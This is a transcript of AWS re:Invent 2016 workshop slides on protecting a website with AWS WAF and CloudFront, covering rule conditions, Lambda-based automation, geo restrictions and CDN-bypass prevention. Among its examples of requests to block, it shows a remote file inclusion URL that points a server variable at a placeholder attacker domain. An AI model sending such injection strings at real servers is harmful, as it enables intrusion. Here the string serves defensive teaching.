Top Banner
© 2016, Amazon Web Services, Inc. or its Affiliates. All rights reserved. Vlad Vlasceanu, Heitor Vital, Chris Colthurst November 29, 2016 Secure Your Web Application with AWS WAF and Amazon CloudFront SAC202 - Workshop
69

AWS re:Invent 2016: Workshop: Secure Your Web Application with AWS WAF and Amazon CloudFront (SAC202)

Apr 16, 2017

Download

Technology

Welcome message from author
This document is posted to help you gain knowledge. Please leave a comment to let me know what you think about it! Share it to your friends and learn new things together.
Transcript
Page 1: AWS re:Invent 2016: Workshop: Secure Your Web Application with AWS WAF and Amazon CloudFront (SAC202)

© 2016, Amazon Web Services, Inc. or its Affiliates. All rights reserved.

Vlad Vlasceanu, Heitor Vital, Chris Colthurst

November 29, 2016

Secure Your Web Application with

AWS WAF and Amazon CloudFront

SAC202 - Workshop

Page 2: AWS re:Invent 2016: Workshop: Secure Your Web Application with AWS WAF and Amazon CloudFront (SAC202)

The workshop team is here to help!

Chris Colthurst Sean Greathouse Assaf Namer

Heitor Vital Vlad Vlasceanu Christian Williams

Page 3: AWS re:Invent 2016: Workshop: Secure Your Web Application with AWS WAF and Amazon CloudFront (SAC202)

What to expect from the workshop

• Each table expected to work as a team – find your number table

• Content is broken up into 3 chapters:

• Introduction and baseline protection

• Security automation

• Advanced rules and additional security controls

• Team tasks:

• Start with a baseline sample website (provided)

• 3 tasks: implement the controls discussed in each chapter

• Handout:

• Contains additional guidance for each task

• Find and implement the optimal solution!

Page 4: AWS re:Invent 2016: Workshop: Secure Your Web Application with AWS WAF and Amazon CloudFront (SAC202)

A story of courage, friendship

… and WAF

Page 5: AWS re:Invent 2016: Workshop: Secure Your Web Application with AWS WAF and Amazon CloudFront (SAC202)

Prelude

Your friend Bob knows that you’re great with computers

and asks you to set up a website for him…

Page 6: AWS re:Invent 2016: Workshop: Secure Your Web Application with AWS WAF and Amazon CloudFront (SAC202)

Setup workshop environment

Follow the steps in the Prelude section of your handout to launch the AWS

CloudFormation template:

Checkpoint: What is AWS CloudFormation?

Download the CloudFormation template from:https://s3-us-west-2.amazonaws.com/sac202-waf/sac202-cloudformation.json

Launch a CloudFormation stack using the downloaded templateDetailed steps are available in your handout document

1

3

Open the AWS Management Console for your account and go to

CloudFormation Select the Oregon, N. Virginia or Ireland AWS regions in the top right corner

2

Page 7: AWS re:Invent 2016: Workshop: Secure Your Web Application with AWS WAF and Amazon CloudFront (SAC202)

Chapter 1: Baseline website

and web application protection

Page 8: AWS re:Invent 2016: Workshop: Secure Your Web Application with AWS WAF and Amazon CloudFront (SAC202)

What is a web application firewall?

• Web application firewall (WAF) is an appliance,

server plugin, or filter that applies a set of rules

to HTTP traffic

• WAFs come in four flavors

• Pure play: Standalone appliance or software

• CDN: bundled with content delivery network

• Load balancer: bundled with a load balancer

• Universal threat manager (UTM): catch-all

for misc. security

Page 9: AWS re:Invent 2016: Workshop: Secure Your Web Application with AWS WAF and Amazon CloudFront (SAC202)

Why use a WAF?

Application vulnerabilities:

Good users

Bad folks

Web server Database

Exploit

codeYour application

Page 10: AWS re:Invent 2016: Workshop: Secure Your Web Application with AWS WAF and Amazon CloudFront (SAC202)

Why use a WAF?

Abuse detection and prevention:

Good users

Bad folks

Web server Database

Your applicationData

leaks

Page 11: AWS re:Invent 2016: Workshop: Secure Your Web Application with AWS WAF and Amazon CloudFront (SAC202)

Why use a WAF?

Distributed denial of service (DDOS) attacks:

Good users

Bad folks

Web server Database

Your application

Page 12: AWS re:Invent 2016: Workshop: Secure Your Web Application with AWS WAF and Amazon CloudFront (SAC202)

AWS

WAF

Why use a WAF?

AWS WAF block the bad folks and allow the good users:

Good users

Bad folks

Web server Database

Your application

Page 13: AWS re:Invent 2016: Workshop: Secure Your Web Application with AWS WAF and Amazon CloudFront (SAC202)

Why use a WAF?

• WAFs help protect websites and applications against

attacks that cause data breaches and downtime

• General WAF use cases• Protect from SQL injection (SQLi) and cross-site scripting (XSS)

• Prevent website scraping, crawlers, and BOTs

• Mitigate DDOS (HTTP/HTTPS floods)

• Gartner reports that main driver of WAF purchases (25-

30%) is PCI compliance

Page 14: AWS re:Invent 2016: Workshop: Secure Your Web Application with AWS WAF and Amazon CloudFront (SAC202)

What about DDOS?

DDOSTargeted

attacksWAF

Reflection and

amplification

Layer 4 and 7

floods

Slowloris

SSL abuse

HTTP floods

SQL injection

Bots and probes

Application

exploits

Social

engineering

Reverse

engineering

Page 15: AWS re:Invent 2016: Workshop: Secure Your Web Application with AWS WAF and Amazon CloudFront (SAC202)

Attack vectors addressed by AWS WAF

• SQL injection: Attackers insert malicious SQL code into web requests in

an effort to extract data from your database

• Cross-site scripting (XSS): Malicious scripts are injected into otherwise

benign and trusted websites

• Scanners and probes: Malicious sources scan and probe Internet-facing

web applications for vulnerabilities

• Known attacker origins (IP reputation lists): A number of organizations

maintain reputation lists of IP addresses of known attackers

• Bots and scrapers: Some automated clients misrepresent themselves to

bypass restrictions

• Application-level exploits

Page 16: AWS re:Invent 2016: Workshop: Secure Your Web Application with AWS WAF and Amazon CloudFront (SAC202)

Amazon CloudFront + AWS WAF

Amazon CloudFront

• 68 points of presence around the world

• Improves performance by caching static

content and optimizing connections for

dynamic content

• Disperses traffic across global edge locations

• DDOS attacks (such as HTTP floods) are

absorbed close to the source

Page 17: AWS re:Invent 2016: Workshop: Secure Your Web Application with AWS WAF and Amazon CloudFront (SAC202)

Introducing the AWS WAF

Page 18: AWS re:Invent 2016: Workshop: Secure Your Web Application with AWS WAF and Amazon CloudFront (SAC202)

Unique aspects of AWS WAF

• Customizable rules created by customers to

avoid false positives

• Full-feature API: This is a DevOps WAF that can

be deployed inline with new websites and

applications

• Integrated with AWS: CloudFront, CloudWatch

• Integrated with partners: Alert Logic, TrendMicro,

Imperva

• Pay as you go pricing

Page 19: AWS re:Invent 2016: Workshop: Secure Your Web Application with AWS WAF and Amazon CloudFront (SAC202)

AWS WAF components

1. Conditions:

• IP match

• String match

• SQL injection match

• Cross-site scripting match

• Size constraints

2. Rules: Precedence / rule / action

3. Web access control lists (web ACL)

4. AWS resource: CloudFront distribution

5. Reporting: Real-time metrics, sampled web requests

Page 20: AWS re:Invent 2016: Workshop: Secure Your Web Application with AWS WAF and Amazon CloudFront (SAC202)

• Conditions are lists of criteria that

identify components of web requests

• Conditions include matching on the following:

• IP address i.e., /8, /16, /24, /32

• Strings, i.e., URI, query string, header, etc.

• SQL injection, i.e., looks for valid SQL statements

• Conditions are logically disjoined

• Conditions are reusable elements

• Filter targets and transformations

• Positional constraints (contains, exact,…)

AWS WAF: Conditions

Page 21: AWS re:Invent 2016: Workshop: Secure Your Web Application with AWS WAF and Amazon CloudFront (SAC202)

AWS WAF: Rules

• Rules are sets of conditions with a

predetermined action

• Available actions are:

• Block

• Allow

• Count

• Rules can logically join conditions

• Rules are reusable elements

Page 22: AWS re:Invent 2016: Workshop: Secure Your Web Application with AWS WAF and Amazon CloudFront (SAC202)

AWS WAF: Web ACL

• Web ACLs contain a set of conditions, rules, and

actions

• Web ACLs are applied to one or many CloudFront

distributions

• Web ACLs show you real-time metrics and sampled

web requests for each rule

• Web ACLs evaluate rules in order

• Whitelisting or blacklisting behavior

Page 23: AWS re:Invent 2016: Workshop: Secure Your Web Application with AWS WAF and Amazon CloudFront (SAC202)

AWS WAF: Resource

Web ACLs are applied to CloudFront distributions

• Rule reusability: use one web ACL for all

distributions

• Flexibility: use individual web ACL for each

distribution

Page 24: AWS re:Invent 2016: Workshop: Secure Your Web Application with AWS WAF and Amazon CloudFront (SAC202)

AWS WAF: Reporting and logs

• Real-time metrics (CloudWatch):• Blocked web requests

• Allowed web requests

• Counted web requests

• Adjustments to rules in response to

real-time metrics and sampled

requests

• Time period can be adjusted by

sliding graph endpoints or via filters.

Page 25: AWS re:Invent 2016: Workshop: Secure Your Web Application with AWS WAF and Amazon CloudFront (SAC202)

AWS WAF request process

Page 26: AWS re:Invent 2016: Workshop: Secure Your Web Application with AWS WAF and Amazon CloudFront (SAC202)

Example: Whitelisting good users

Verify that a valid referrer is present

Host: www.example.com

User-Agent: Mozilla/5.0 (Macintosh; …

Accept: image/png,image/*;q=0.8,*/*;q=0.5

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Referrer: http://www.example.com/

Connection: keep-alive

AWS

WAF

RAW request headers

CloudFront

Check: Header “Referrer”

Match Type: Contains

Match: “example.com”

Action: ALLOW

Rule

String match condition

Good users

Page 27: AWS re:Invent 2016: Workshop: Secure Your Web Application with AWS WAF and Amazon CloudFront (SAC202)

Example: Blacklisting bad bots

Block unwanted user agent headers and use transforms to stop evasion:

Host: www.example.com

User-Agent: bAdBoT

Accept: image/png,image/*;q=0.8,*/*;q=0.5

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Referrer: http://www.InTeRnEtkItTiEs.com/

Connection: keep-alive

AWS

WAF

RAW request headers

CloudFront

Check: Header “User-Agent”

Transform: To lower

Match Type: Contains

Match: “badbot”

Action: BLOCK

Rule

String match condition

Scraper bot

Page 28: AWS re:Invent 2016: Workshop: Secure Your Web Application with AWS WAF and Amazon CloudFront (SAC202)

Bob runs for city council

and is worried

Page 29: AWS re:Invent 2016: Workshop: Secure Your Web Application with AWS WAF and Amazon CloudFront (SAC202)

Task 1: Protect Bob’s

campaign website from threats

Page 30: AWS re:Invent 2016: Workshop: Secure Your Web Application with AWS WAF and Amazon CloudFront (SAC202)
Page 31: AWS re:Invent 2016: Workshop: Secure Your Web Application with AWS WAF and Amazon CloudFront (SAC202)

Chapter 2: AWS WAF security

automation

Page 32: AWS re:Invent 2016: Workshop: Secure Your Web Application with AWS WAF and Amazon CloudFront (SAC202)

The story so far

We have a website (or web application) operational✓

Able to monitor it and analyze logs✓

Able to filter basic common attack vectors✓

Page 33: AWS re:Invent 2016: Workshop: Secure Your Web Application with AWS WAF and Amazon CloudFront (SAC202)

Bob won the election and is

busy improving the lives of his

constituency

Page 34: AWS re:Invent 2016: Workshop: Secure Your Web Application with AWS WAF and Amazon CloudFront (SAC202)

The threat landscape is evolving

Dynamically reconfigure the WAF rules and conditions to

better adapt to changing threats

• React to changing sources of malicious traffic

• React to changing signatures of malicious requests

• Leverage reputation lists and keep them updated

• Predictive analysis

Page 35: AWS re:Invent 2016: Workshop: Secure Your Web Application with AWS WAF and Amazon CloudFront (SAC202)

Integration with DevOps Analyzer

AWS

WAF

Logs

Threat

analysis

Rule updaterNotification

Security

engineer

Web serverGood users

Bad folks

Page 36: AWS re:Invent 2016: Workshop: Secure Your Web Application with AWS WAF and Amazon CloudFront (SAC202)

Integration with DevOps Scheduled

Threat

database

Scheduler

AWS

WAF

Web serverGood users

Bad folks

Rule updater

Page 37: AWS re:Invent 2016: Workshop: Secure Your Web Application with AWS WAF and Amazon CloudFront (SAC202)

Building blocks

Amazon

S3AWS

Lambda

Amazon

CloudWatch

AWS

CloudFormation

Amazon

API GatewayAWS WAF

Amazon

CloudFront

Amazon

Machine

Learning

Amazon

Kinesis

Amazon

SNS

Logs1. Analyzer

2. Rule updater

Metrics

& Alarms Pack solution

HTTP/S

endpointRule engine

Entry point

Advanced

analysis

Log

streamingAlerts

Page 38: AWS re:Invent 2016: Workshop: Secure Your Web Application with AWS WAF and Amazon CloudFront (SAC202)

Security automation examples

HTTP floods Scanners and

probes

IP reputation lists Bots and scrapers

Page 39: AWS re:Invent 2016: Workshop: Secure Your Web Application with AWS WAF and Amazon CloudFront (SAC202)

Security automation examples

HTTP floods Scanners and

probes

IP reputation lists Bots and scrapers

Page 40: AWS re:Invent 2016: Workshop: Secure Your Web Application with AWS WAF and Amazon CloudFront (SAC202)

Log parser

HTTP flood

Scanner & probe protection

new access log files

a

Amazon

CloudFront

Amazon S3

Bucket

AWS Lambda

Log ParserAWS WAF

b

c

Page 41: AWS re:Invent 2016: Workshop: Secure Your Web Application with AWS WAF and Amazon CloudFront (SAC202)

Security automation examples

HTTP floods Scanners and

probes

IP reputation lists Bots and scrapers

Page 42: AWS re:Invent 2016: Workshop: Secure Your Web Application with AWS WAF and Amazon CloudFront (SAC202)

IP reputation lists

known-attacker

protection

hourly

a

Amazon

CloudFrontAWS Lambda

IP Lists Parser

AWS WAF

b

c

Amazon

CloudWatch

event

Third-party IP

reputation lists

Page 43: AWS re:Invent 2016: Workshop: Secure Your Web Application with AWS WAF and Amazon CloudFront (SAC202)

Security automation examples

HTTP floods Scanners and

probes

IP reputation lists Bots and scrapers

Page 44: AWS re:Invent 2016: Workshop: Secure Your Web Application with AWS WAF and Amazon CloudFront (SAC202)

Bots and scrapers

bad bot

scraper protection

Amazon

CloudFront

AWS Lambda

Access Handler

AWS WAF

b

c

d

web application

resources

<a href="/v1/name/" style="display: none" aria-hidden="true">honeypot link</a>

a

Page 45: AWS re:Invent 2016: Workshop: Secure Your Web Application with AWS WAF and Amazon CloudFront (SAC202)

Bob runs for state senate

and is very worried

Page 46: AWS re:Invent 2016: Workshop: Secure Your Web Application with AWS WAF and Amazon CloudFront (SAC202)

Task 2: Protect Bob’s

campaign website from

changing threats

Page 47: AWS re:Invent 2016: Workshop: Secure Your Web Application with AWS WAF and Amazon CloudFront (SAC202)

AWS

WAF

Good users

Hands-On: HTTP/S protection

Bad folks

Runs for state senate

Page 48: AWS re:Invent 2016: Workshop: Secure Your Web Application with AWS WAF and Amazon CloudFront (SAC202)
Page 49: AWS re:Invent 2016: Workshop: Secure Your Web Application with AWS WAF and Amazon CloudFront (SAC202)

Chapter 3: Additional security

controls

Page 50: AWS re:Invent 2016: Workshop: Secure Your Web Application with AWS WAF and Amazon CloudFront (SAC202)

The story so far

We have a website (or web application) operational✓

Able to monitor it and analyze logs✓

Able to filter basic common attack vectors✓

Able to automate and react to dynamic security

conditions✓

Page 51: AWS re:Invent 2016: Workshop: Secure Your Web Application with AWS WAF and Amazon CloudFront (SAC202)

Bob won the election and is

busy improving the lives of his

constituency

Page 52: AWS re:Invent 2016: Workshop: Secure Your Web Application with AWS WAF and Amazon CloudFront (SAC202)

Where do we go from here?

What can we do to further improve security?

Restrict content to the geography of our audience✓

Securing our specific application profile✓

Prevent CDN bypass✓

Comprehensive look at web app security – OWASP Top 10✓

Page 53: AWS re:Invent 2016: Workshop: Secure Your Web Application with AWS WAF and Amazon CloudFront (SAC202)

OWASP top 10 (2013)

Represents a broad consensus about what the most critical web application

security flaws are

A1

Injection

A2

Broken auth. And

session mgmt.

A3

Cross-site scripting

(xss)

A4

Insecure direct

object references

A5

Security

misconfiguration

A6

Sensitive data

exposure

A7

Missing function

level access ctrl.

A8

Cross-site request

forgery (csrf)

A9

Using components

with known

vulnerabilities

A10

Unvalidated

redirects and

forwards

Page 54: AWS re:Invent 2016: Workshop: Secure Your Web Application with AWS WAF and Amazon CloudFront (SAC202)

OWASP top 10 (2013)

Not all OWASP top 10 flaws can be addressed with a WAF

Security flaws that AWS WAF can help mitigate to varying degrees:

A1

Injection

(E.G. Sql injection)

A2

Broken auth. And

session mgmt.

A3

Cross-site scripting

(xss)

A4

Insecure direct

object references

A5

Security

misconfiguration

A6

Sensitive data

exposure

A7

Missing function

level access ctrl.

A8

Cross-site request

forgery (csrf)

A9

Using components

with known

vulnerabilities

A10

Unvalidated

redirects and

forwards

✓ ✓

Page 55: AWS re:Invent 2016: Workshop: Secure Your Web Application with AWS WAF and Amazon CloudFront (SAC202)

Securing our specific application profile

Know your application in-depth, even is it’s a open

source/commercial off-the-shelf productWhat services/URL paths does it expose to the web?

Keep them all up-to-date, and install security patches

timelyKeep exposure footprint low

1

3

Know the packages, libraries, components your

application is leveragingAdditional features and services they exposed

2

Page 56: AWS re:Invent 2016: Workshop: Secure Your Web Application with AWS WAF and Amazon CloudFront (SAC202)

Limit access to nonpublic features

Does your website/application have a control/admin interface?

• Whitelist access to only known IP sources

At risk for vulnerable platform runtime/middleware?

• Block suspect requests by string matching

Does your app or runtime server-side include web accessible

components?

• Block access to such component URLs via string matching

Wordpress Admin: http://<my_domain>/wp-admin/

http://<my_domain>/?_SERVER[DOCUMENT_ROOT]=http://<bad_domain>/bad.txt?

http://<your_joomla_cms>/components/com_mojo/wp-comments-post.php

Page 57: AWS re:Invent 2016: Workshop: Secure Your Web Application with AWS WAF and Amazon CloudFront (SAC202)

Example: Using string match sets

{"ByteMatchSet": {"ByteMatchSetId": "xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx","Name": "my-string-filters","ByteMatchTuples": [

{

"TargetString": "/wp-admin",

"PositionalConstraint": "STARTS_WITH",

"TextTransformation": ”URL_DECODE",

"FieldToMatch": { "Type": "URI" }

}

]

}

}

Page 58: AWS re:Invent 2016: Workshop: Secure Your Web Application with AWS WAF and Amazon CloudFront (SAC202)

CloudFront geo restrictions

Geo restrictions or geoblocking: prevent users in specific

geographic locations from accessing content

• Amazon CloudFront supports geo restrictions at the country level

• Whitelisting or blacklisting approach

• Most commonly used to limit access to content to locations where a

distribution right exists

• Security perspective: limit exposure footprint and potentially

increase cost of launching attacks against your website

Page 59: AWS re:Invent 2016: Workshop: Secure Your Web Application with AWS WAF and Amazon CloudFront (SAC202)

CloudFront geo restrictions in depth

• CloudFront distribution level restrictions

• CloudFront uses a third-party GeoIP database

• 99.8% accurate source IP geolocation

• Based on distribution restrictions, edge

location decides to allow or block

• Blocked requests return a 403 (Forbidden)

status code

Page 60: AWS re:Invent 2016: Workshop: Secure Your Web Application with AWS WAF and Amazon CloudFront (SAC202)

Prevent CDN bypassing

Deploying a WAF filtering at the edge is effective

... as long as bad folks can’t bypass your CloudFront distribution

• Configure origins to only accept traffic from the CloudFront edge

locations

• Set up S3 origins to use an origin access identity (OAI) and

configure S3 bucket policies to accept GetObject API calls from the

OAI principal

• Configure firewall rules on custom origins to accept traffic only from

CloudFront IP ranges

Page 61: AWS re:Invent 2016: Workshop: Secure Your Web Application with AWS WAF and Amazon CloudFront (SAC202)

Getting the AWS IP ranges

AWS publishes its current IP address ranges in JSON format:

• Both IPV4 and IPV6 ranges are published

• Filter the service attribute by the CLOUDFRONT value

• Track changes in list via the createDate attribute

• Subscribe to the following Amazon SNS topic to receive notifications

when AWS IP address ranges change:

https://ip-ranges.amazonaws.com/ip-ranges.json

Topic ARN: arn:aws:sns:us-east-1:806199016981:AmazonIpSpaceChanged

Page 62: AWS re:Invent 2016: Workshop: Secure Your Web Application with AWS WAF and Amazon CloudFront (SAC202)

Automatic VPC security group updates

Blog post: How to Automatically Update Your Security Groups for

Amazon CloudFront and AWS WAF by Using AWS Lambda

http://amzn.to/2fj4Q8e

Create a VPC security groupUse tagging to designate they can be autoupdated

Create the AWS Lambda functionUsing the provided code and execution role

1

3

Create an IAM policy and AWS Lambda execution roleGrant the function permission to change the security group

2

Create the function triggerUsing the Amazon SNS AmazonIpSpaceChanges topic

4

Page 63: AWS re:Invent 2016: Workshop: Secure Your Web Application with AWS WAF and Amazon CloudFront (SAC202)

Bob runs for congress

and is extremely worried

Page 64: AWS re:Invent 2016: Workshop: Secure Your Web Application with AWS WAF and Amazon CloudFront (SAC202)

Task 3: Add additional security

controls to bob’s campaign

website

Page 65: AWS re:Invent 2016: Workshop: Secure Your Web Application with AWS WAF and Amazon CloudFront (SAC202)
Page 66: AWS re:Invent 2016: Workshop: Secure Your Web Application with AWS WAF and Amazon CloudFront (SAC202)

Thank you!

Page 67: AWS re:Invent 2016: Workshop: Secure Your Web Application with AWS WAF and Amazon CloudFront (SAC202)

Useful resources

AWS WAF Security Automations

https://aws.amazon.com/answers/security/aws-waf-security-automations/

AWS Best Practices for DDOS Resiliency

https://d0.awsstatic.com/whitepapers/Security/DDoS_White_Paper.pdf

Page 68: AWS re:Invent 2016: Workshop: Secure Your Web Application with AWS WAF and Amazon CloudFront (SAC202)

Remember to complete

your evaluations!

Page 69: AWS re:Invent 2016: Workshop: Secure Your Web Application with AWS WAF and Amazon CloudFront (SAC202)

Related sessions

CTD204 – Offload Security Heavy-lifting to the AWS Edge- Nihar Bihani, Sr. Manager, AWS Product Management

SAC304 - Predictive Security: Using Big Data to Fortify Your Defenses- Michael Capicotto and Matt Nowina, AWS Solutions Architects

SAC316 - Security Automation: Spend Less Time Securing Your

Applications- Venkat Vijayaraghavan, AWS Sr. Product Manager; Nathan Dye, AWS Software

Development Manager